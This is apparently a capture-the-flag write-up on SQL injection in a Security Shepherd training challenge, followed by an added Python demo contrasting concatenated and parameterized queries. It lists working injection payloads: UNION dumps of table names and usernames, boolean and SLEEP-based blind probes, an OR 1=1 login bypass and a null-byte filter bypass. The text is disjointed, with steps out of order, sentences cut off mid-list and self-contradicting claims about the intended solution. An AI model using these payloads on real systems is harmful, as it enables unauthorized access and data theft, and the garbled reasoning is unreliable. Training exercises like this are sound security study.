SQL Injection Challenge 5 Security Shepherd May 2026

We need to know the table where user data is stored. In MySQL (which Shepherd typically uses), table names are listed in information_schema.tables.

Payload:

' UNION SELECT 1, table_name, 3 FROM information_schema.tables-- 

Note: We use numbers 1 and 3 as placeholders for the columns we don't care about seeing.

This injection will list table names. You look for a table named something like users or app_users.

Imagine the backend PHP/Node code looks something like this (simplified):

SELECT * FROM users WHERE user_id = ' [user input] '

If the user submits 5, the query becomes:

SELECT * FROM users WHERE user_id = '5'

If a user with ID 5 exists, the app returns "Found." If not, "Not found."

Now, if the developer does not sanitize input, an attacker can inject logic:

Input: 5' AND '1'='1

Query: SELECT * FROM users WHERE user_id = '5' AND '1'='1' (always true if ID=5 exists)

Response: "Found"

Input: 5' AND '1'='2

Query: SELECT * FROM users WHERE user_id = '5' AND '1'='2' (always false)

Response: "Not found"

This binary difference is the entire attack surface.
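
The query construction described above, shown next to a parameterized version, as an added example that is not part of the original page. It assumes an in-memory SQLite table standing in for the MySQL backend; the function names and the sample row are hypothetical and constructed for the demonstration.

```python
import sqlite3

# The two probe inputs quoted in the text above.
PROBE_TRUE = "5' AND '1'='1"
PROBE_FALSE = "5' AND '1'='2"

def make_db():
    """Constructed in-memory table; SQLite stands in for MySQL (assumption)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (user_id TEXT PRIMARY KEY, name TEXT)")
    db.execute("INSERT INTO users VALUES ('5', 'constructed-user')")
    return db

def lookup_concat(db, user_input):
    """Vulnerable form: input is spliced into the SQL text, as in the page's query."""
    query = "SELECT * FROM users WHERE user_id = '" + user_input + "'"
    return "Found" if db.execute(query).fetchone() else "Not found"

def lookup_param(db, user_input):
    """Hardened form: input is bound as a value and never parsed as SQL."""
    query = "SELECT * FROM users WHERE user_id = ?"
    return "Found" if db.execute(query, (user_input,)).fetchone() else "Not found"

def has_boolean_oracle(lookup, db):
    """Regression check: do the true/false probes produce different responses?"""
    return lookup(db, PROBE_TRUE) != lookup(db, PROBE_FALSE)

if __name__ == "__main__":
    db = make_db()
    for name, fn in (("concat", lookup_concat), ("param", lookup_param)):
        for value in ("5", PROBE_TRUE, PROBE_FALSE):
            print(f"{name:6} {value!r:18} -> {fn(db, value)}")
        print(f"{name:6} boolean oracle present: {has_boolean_oracle(fn, db)}")
```

With the bound parameter, both probe strings are compared as literal IDs, so the response no longer depends on the injected condition.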


Without SELECT, we can use:

But wait: can you use UNION without SELECT? No, UNION requires SELECT.

However, in MySQL, you can use PROCEDURE ANALYSE() to extract data, but that’s advanced.

The actual intended solution for Shepherd Challenge 5:

Use time-based blind injection with SLEEP() and IF():

admin' AND IF(SUBSTRING((SELECT flag FROM flags),1,1)='a', SLEEP(5), 0) -- -

But AND and SELECT are filtered.

So we bypass AND by using *:

admin' * IF(1, SLEEP(5), 0) -- -

But no.

According to official write-ups, the trick in Challenge 5 is that the filter is applied only to the username field, not the password field, so you can inject in the password field.

Final working exploit:

Username: admin

Password: ' OR 1=1 --

But OR is filtered, though perhaps only in the username field. Test this: if the filter is global, the payload fails.

Thus, the robust solution: use ' || '1'='1 in the password field.

To perform a UNION SELECT, your injected query must have the same number of columns as the original query. We need to find this number.

Try injecting the following payloads to test for column count using the ORDER BY technique:

Payload 1: ' ORDER BY 1-- (If no error, there is at least 1 column)

Payload 2: ' ORDER BY 2-- (If no error, there are at least 2 columns)

Payload 3: ' ORDER BY 3-- (If no error, there are at least 3 columns)

Payload 4: ' ORDER BY 4--

If the application returns an error (or a blank page) at ORDER BY 4, but worked for ORDER BY 3, then the original query has 3 columns.

Author: Security Researcher
Date: April 11, 2026
Subject: Web Application Security / SQL Injection (Level: Intermediate)

Challenge 5 is notorious for implementing naïve blacklist filtering. You may encounter blocks on:

Example filtered bypass: 1%00%20AND%201=2%00%20UNION%00%20SELECT%00%201,group_concat(username),3%00%20FROM%00%20users
